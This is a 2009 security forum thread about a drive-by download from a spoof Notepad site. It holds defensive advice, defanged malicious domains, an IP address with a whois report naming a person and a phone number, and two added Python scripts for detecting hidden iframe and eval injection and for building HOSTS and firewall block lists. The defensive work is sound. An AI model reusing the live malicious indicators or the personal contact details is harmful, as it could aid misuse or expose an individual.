Hit by 0Day Drive by Download - What to Do?

Discussion in 'malware problems & news' started by 1boss1, Jul 19, 2009.

Thread Status:
Not open for further replies.
  1. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    I know prevention is better than cure, but sometimes things happen. Last night I searched "Notepad" looking at other Notepad++ alternatives, clicked on notepad dot org on the first page and got hit by a drive-by download.

    The JavaScript called 3 .cn domains, tried to launch .pdf and Flash, and I (or it) crashed Firefox as I was hitting the red 'X' in an attempt to kill the browser.

    Norton didn't log anything, and I scanned with Malwarebytes and Prevx, which came up with nothing. I also manually looked at files in \Content.IE5\ and similar places to look for evidence of downloaded files. I also Googled the .cn domains to see what they did, but one had no search results. Then I ran CCleaner to remove all junk files.

    Because there are so many 0Days, and malware signatures change by the second so they are not detectable, I'm wondering... What steps would you take if you were hit like this?

    How would you go about detecting what was done, and correcting it?
     
  2. Cudni

    Cudni Global Moderator

    Joined:
    May 24, 2009
    Posts:
    6,956
    Location:
    Somethingshire
    You do exactly what you did and check with anything you have. In future, disable scripting for all sites except trusted ones to further remove the chance of a drive-by download.
     
  3. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,057
    You also might consider running Sandboxie. Then even if there was something bad, it wouldn't have hurt you.

    Pete
     
  4. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    That's what I was also going to suggest, but from what I see in the user's signature, Sandboxie is being used. So, I guess that's why the system wasn't infected.
     
  5. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    Since you use Sandboxie (according to your signature) I assume that's why you found nothing in your system.

    In future, you may want to prevent that sort of thing from happening. As Cudni suggested, disabling JavaScript will prevent any malicious domain from damaging your system, if it requires JavaScript to be enabled.

    I go even further. I have a default-deny for JavaScript, Java and plug-ins. I only allow these sorts of content per site, and only on those I trust. I also only allow what they need. If XYZ site I know needs JavaScript, then I only allow JavaScript.

    Bottom line is, if those domains require one of those technologies to attack your system, and if they're denied, then they can't damage your system.
     
  6. Osaban

    Osaban Registered Member

    Joined:
    Apr 11, 2005
    Posts:
    4,222
    Yes, Sandboxie probably managed to protect the system. What about Malware Defender, no alerts?
     
  7. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Excellent, thank you. It was bugging me whether I could have done anything else to locate/fix whatever happened.

    So I figured it would be good to develop a logical step-by-step process of things to do, check, scan with etc. to best locate any infection and mitigate it as soon as it occurs. People searching Google who have no clue about scripting, Sandboxie etc. will no doubt find it useful also.

    My mother for instance would panic, and reboot which wouldn't be the best thing to do.

    This system I was using wasn't mine, so no Sandboxie or Malware Defender. It was Vista with UAC enabled; Flash & PDF were fully updated, however Windows had an outstanding critical update for the latest font vulnerability. For some reason Vista didn't warn of any updates; it wasn't until I double-checked with Secunia PSI that this became known.

    I should have mentioned I wasn't on my regular system, sorry.

    With zero-day exploits and unknown signatures becoming more common, obviously scanning the computer with ABC tool and finding nothing doesn't guarantee much. That's why I was wondering how best to respond to an "unknown" web-based exploit.

    I was surprised Norton stayed silent, one of the .cn domains was the Microsoft misspelling that Norton knows about.
     
  8. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    1. You could do a simple Windows search for recent *.exe as well.

    2. Even if an exe was downloaded, UAC should alert before it was allowed to run.

    3. Was Firefox configured to download PDFs or open them in the browser?
    If it was set to download the PDF, then no malware download attempt could happen unless the PDF was opened in Explorer.

    4. If Flash was up to date then I think that sounds ok too.

    5. Prevx and MBAM are very good scanners; you could try a few other online ones to reassure yourself, like KAV.
    The NOD32 SysInspector.exe and MS Procmon.exe tools are very powerful.

    I would be pretty confident the system was ok though.
     
    Last edited: Jul 19, 2009
  9. G1111

    G1111 Registered Member

    Joined:
    May 11, 2005
    Posts:
    2,127
    Location:
    USA
    The site appears to be still active today. KAV 2010 blocked some malware from the site.
     
  10. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    If you guys can, please provide the site names/IP ranges.

    Thanks
     
  11. m00nbl00d

    m00nbl00d Registered Member

    Joined:
    Jan 4, 2009
    Posts:
    6,623
    I make yours my request. It would be interesting to know about the domains.
     
  12. JRViejo

    JRViejo Global Moderator

    Joined:
    Jul 9, 2008
    Posts:
    20,980
    Location:
    U.S.A.
    The site mentioned by 1boss1 would be a good one for Rmus to dissect, but novices be warned, any browser without script protection will trigger the hidden scripts; my Firefox (with NoScript) does not!

    From what I gather, the Description meta tag states "Notepad parody spoof HTML editor" and the links at the bottom of the page do open your own PC's Notepad, so it seems like a joke, especially when one sees the "Created by Notepad logos" page.

    However, the page source reveals 8 scripts inside the body text, 7 of which open iframes to Chinese web sites via document.write functions, overwriting the home page. The eighth one is an eval function that seems to be the command execution script. I did not go as far as triggering the scripts, leaving that to Rmus. Hopefully, Rich will see this thread soon.

    @Escalader, according to the scripts, the sites are:

    delzzerro dot cn - No advisories yet!
    updatedate dot cn (used 3 times) - Norton Advisory
    microsotf dot cn (used 3 times) - Google Advisory
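    A small offline triage script for the pattern JRViejo describes above (inline scripts that document.write an iframe to a third-party host, plus one eval call), added here as an example; it is not code from this thread or from any product mentioned in it. It reads a saved copy of a page, never fetches or executes anything, and the sample HTML inside it is constructed with reserved .invalid placeholder hosts rather than the real domains.

```python
"""Offline triage of a saved HTML page for the drive-by pattern described
in this thread: inline <script> blocks that document.write() an <iframe>
pointing at a third-party host, and any eval() call.  Added example, not
code from the thread; nothing here fetches or executes the page."""
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# document.write('...') or document.write("..."); the string body is group 2
DOCWRITE_RE = re.compile(r"document\.write\s*\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
IFRAME_SRC_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
EVAL_RE = re.compile(r"\beval\s*\(")
# zero-size or invisible frames are the usual way a drive-by hides its loader
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Constructed sample page; hosts use the reserved .invalid TLD, not the real domains.
SAMPLE_HTML = """<html><body>
<p>Notepad parody spoof HTML editor</p>
<script>document.write('<iframe src="http://first-bad.invalid/in.php" width=0 height=0></iframe>');</script>
<script>document.write("<iframe src='http://second-bad.invalid/x/' style='display:none'></iframe>");</script>
<script>document.write('<iframe src="http://second-bad.invalid/y/" width=1 height=1></iframe>');</script>
<script>var p = "unknown"; eval(p);</script>
<script>document.write('<a href="notepad.exe">open notepad</a>');</script>
<script>document.write('<iframe src="http://notepad.example/help.html"></iframe>');</script>
</body></html>"""


def analyze_page(html, page_host):
    """Return one finding per suspicious inline script:
    {'script': n, 'kind': 'external_iframe' | 'eval', 'host': str | None, 'hidden': bool}."""
    findings = []
    for index, body in enumerate(SCRIPT_RE.findall(html), start=1):
        for _quote, written in DOCWRITE_RE.findall(body):
            m = IFRAME_SRC_RE.search(written)
            if not m:
                continue  # document.write of something other than a frame
            host = (urlparse(m.group(1)).hostname or "").lower()
            if host and host != page_host.lower():
                findings.append({"script": index, "kind": "external_iframe",
                                 "host": host, "hidden": bool(HIDDEN_RE.search(written))})
        if EVAL_RE.search(body):
            findings.append({"script": index, "kind": "eval", "host": None, "hidden": False})
    return findings


def external_hosts(findings):
    """Distinct third-party hosts the page tries to frame, for lookup or blocking."""
    return sorted({f["host"] for f in findings if f["host"]})


if __name__ == "__main__":
    found = analyze_page(SAMPLE_HTML, "notepad.example")
    for f in found:
        detail = f" -> {f['host']} (hidden={f['hidden']})" if f["host"] else ""
        print(f"script #{f['script']}: {f['kind']}{detail}")
    print("hosts to look up / block:", external_hosts(found))
```

    Save the page source with the browser (or fetch it from a machine you don't care about) and pass the text plus the page's own hostname; same-origin frames are ignored, and only the frame hosts and the presence of eval are reported, so the script is safe to run on a page you have not inspected yet.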
     
  13. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    The 3 sites at the end of your post are valid. I have added them to my HOSTS file as 127.0.0.1 loopbacks so my PC cannot connect to them.

    Now I will try to find the IP ranges for them and post back results for the general good of all. Once I have those IP ranges I can add them to my FW block list.

    More later
     
  14. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Thanks, good tips. I didn't really search for recent exes; I checked around in the regular cache locations for any .swf, .pdf and .exe files.

    I thought malware exes could change their creation/modified date to make it appear the file was years old; is this true? I guess even if it is, I'll add searching for recent exes system-wide to the checklist.

    I run a forum of mainly eBay women who don't know an exe from an ActiveX, so running Sandboxie or Malware Defender is well beyond them, but after this recent scare I'm going to put together an easy "checklist" in case any of them get hit. I've already got them running Secunia PSI; most of them had Flash/PDF versions years out of date, which is worrying.

    OK, with Firefox I had the add-on "PDF Download", which allows you to choose to either open the document in the browser or save it. The malware seemed to bypass it: no option came up to choose, but a new PDF tab spawned on the taskbar for about a second.

    I didn't mention the malware domains directly; I wasn't sure if I was allowed, but yes, the ones mentioned were involved. The delzzerro dot cn one had zero Google results when I was hit, so it looks like nobody knows about it yet.
     
  15. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Sorry guys, I've been unsuccessful in decoding the IPs for these 3 sites.

    I must need a new decoder!

    Anybody else want to bail me out?
     
  16. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Doesn't ping from the command prompt give the right IPs?

    Code:
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\Troy>ping delzzerro dot cn
    
    Pinging delzzerro dot cn [91.212.198.37] with 32 bytes of data:
    
    Reply from 91.212.198.37: bytes=32 time=376ms TTL=40
    Reply from 91.212.198.37: bytes=32 time=380ms TTL=40
    Reply from 91.212.198.37: bytes=32 time=376ms TTL=40
    Reply from 91.212.198.37: bytes=32 time=379ms TTL=40
    
    Ping statistics for 91.212.198.37:
        Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 376ms, Maximum = 380ms, Average = 377ms
    
    C:\Documents and Settings\Troy>
    
     
  17. waters

    waters Registered Member

    Joined:
    Nov 8, 2004
    Posts:
    934
    Still live; Microsoft Security Essentials popped up and cleaned it.
     
  18. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Yes! I simply suffered a senior's moment :eek: and forgot that! I think I get tooooo caught up in 3rd party SW matters and forget the basics sometimes!

    Thanks again!
     
  19. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    This is what I got for the IP range. Note it is Russia, not China (.cn).
    What I did was add the full IP range to the OP FW Pro IP Block List as a range. All packets to or from that range are now blocked.

    IP Addresses Report

    Created by using IPNetInfo

    Order: 1
    IP Address: 91.212.198.37
    Status: Succeed
    Country: Russian Federation
    Network Name: NEVAL
    Owner Name: Hosting company LIR.KZ
    From IP: 91.212.198.0
    To IP: 91.212.198.255
    Allocated: Yes
    Contact Name: Nevedomskiy Alexey Alexeevich
    Address: Russian Federation
    Phone: +79024883214
    Whois Source: RIPE NCC
    Host Name:
    Resolved Name:
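    For the HOSTS-file loopbacks from post 13 and the IPNetInfo From/To range in this post, an added example (not code from the thread or from IPNetInfo): it parses the report's "IP Address", "From IP" and "To IP" lines, collapses the range into CIDR blocks of the kind a firewall block list takes, checks an address against them, and writes the 127.0.0.1 HOSTS lines. The report text inside it is a constructed copy of the fields shown above, and the domain input accepts the "dot"-defanged spelling used in this thread.

```python
"""Turn the block-list material from this thread into usable artefacts:
parse an IPNetInfo-style report for its From IP / To IP lines, collapse
that range into CIDR blocks for a firewall rule, test whether an address
falls inside, and emit 127.0.0.1 HOSTS entries for named domains.  Added
example, not code from the thread or from IPNetInfo; SAMPLE_REPORT below
is a constructed copy of the report's layout."""
import ipaddress
import re

SAMPLE_REPORT = """IP Addresses Report

Created by using IPNetInfo

Order 1
IP Address 91.212.198.37
Status Succeed
Country Russian Federation
Network Name NEVAL
From IP 91.212.198.0
To IP 91.212.198.255
Allocated Yes
Whois Source RIPE NCC
"""

# Only the three address fields matter for blocking; the report has one "Label value" per line.
FIELD_RE = re.compile(r"^(IP Address|From IP|To IP)\s+(\S+)\s*$", re.M)


def parse_report(text):
    """Return {'ip', 'from', 'to'} as ipaddress objects; KeyError if a field is missing."""
    fields = dict(FIELD_RE.findall(text))
    return {"ip": ipaddress.ip_address(fields["IP Address"]),
            "from": ipaddress.ip_address(fields["From IP"]),
            "to": ipaddress.ip_address(fields["To IP"])}


def range_to_cidrs(first, last):
    """Collapse an inclusive From/To range into the shortest list of CIDR blocks,
    which is what most firewall block lists want instead of a start/end pair."""
    return [str(net) for net in ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))]


def in_blocked_range(addr, cidrs):
    """True if addr falls inside any of the CIDR blocks."""
    a = ipaddress.ip_address(addr)
    return any(a in ipaddress.ip_network(c) for c in cidrs)


def refang(domain):
    """Accept the ' dot ' spelling used in the thread and return a real hostname."""
    return re.sub(r"\s*\bdot\b\s*", ".", domain.strip().lower())


def hosts_entries(domains, sink="127.0.0.1"):
    """One HOSTS line per domain plus its www. variant, pointed at loopback."""
    lines = []
    for d in (refang(x) for x in domains):
        lines.append(f"{sink} {d}")
        if not d.startswith("www."):
            lines.append(f"{sink} www.{d}")
    return lines


if __name__ == "__main__":
    report = parse_report(SAMPLE_REPORT)
    cidrs = range_to_cidrs(str(report["from"]), str(report["to"]))
    print("block list:", cidrs)
    print("reported address inside block:", in_blocked_range(str(report["ip"]), cidrs))
    print("\n".join(hosts_entries(["delzzerro dot cn", "updatedate dot cn", "microsotf dot cn"])))
```

    The HOSTS entries only stop lookups by name; the CIDR rule is what catches the same server reached by address or by a domain nobody has listed yet, which is why the thread does both.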
     
  20. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    I guess they could; that didn't occur to me! :)

    I personally really like the "default deny" approach.
    I use an app, Anti-Executable, to do it because I'm on XP.
    Vista UAC is very similar to this, so if you have Vista UAC active it's pretty effective.
     
  21. 1boss1

    1boss1 Registered Member

    Joined:
    Jun 26, 2009
    Posts:
    401
    Location:
    Australia
    Hehe, don't worry, I suffer from that also, or "toolitis", where I rely on various tools so much for certain things that I'm lost when they fail.

    I just "assumed" malware could change the creation/modified date because I can do it with a right-click utility I have which is pretty extensive:

    http://i27.tinypic.com/j0xv84.png

    I don't know a whole lot about the PC side of things with exes, DLLs and malware. I'm a web developer, and with so many sites being hacked, injected and FTPs stolen I decided it was time to understand this malware business. :)

    With my desktop it's XP, and yes, I basically use a default-deny approach also, with Outpost set on "Block Most". I don't use Malware Defender much; I only activate it on demand when I want to see registry changes.

    I was really caught off guard with this drive-by; it was on a new Vista laptop that rarely goes on the net, so security was very ordinary on it.

    Thanks for the tips everyone.
     
  22. G1111

    G1111 Registered Member

    Joined:
    May 11, 2005
    Posts:
    2,127
    Location:
    USA
    Visited the site today and it was still active. I got this alert from KAV 2010. Turned off KAV and neither Prevx nor Malware Defender detected anything. Nothing appeared to be loaded/running from the hacked site. Didn't notice anything in DefenseWall.
     


  23. trjam

    trjam Registered Member

    Joined:
    Aug 18, 2006
    Posts:
    9,057
    Location:
    North Carolina
    I just tried and OpenDNS says it is not loading. Weird.
     
  24. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    These guys are now exposed by this forum and by KAV, so they have probably moved on! BUT I'm guessing, so keep shields up!
     
  25. Ilya Rabinovich

    Ilya Rabinovich Developer

    Joined:
    Sep 13, 2005
    Posts:
    1,543
    I can confirm the page is infected with PDF-based exploits. Those guys are using the "do not allow double visits" trick.
     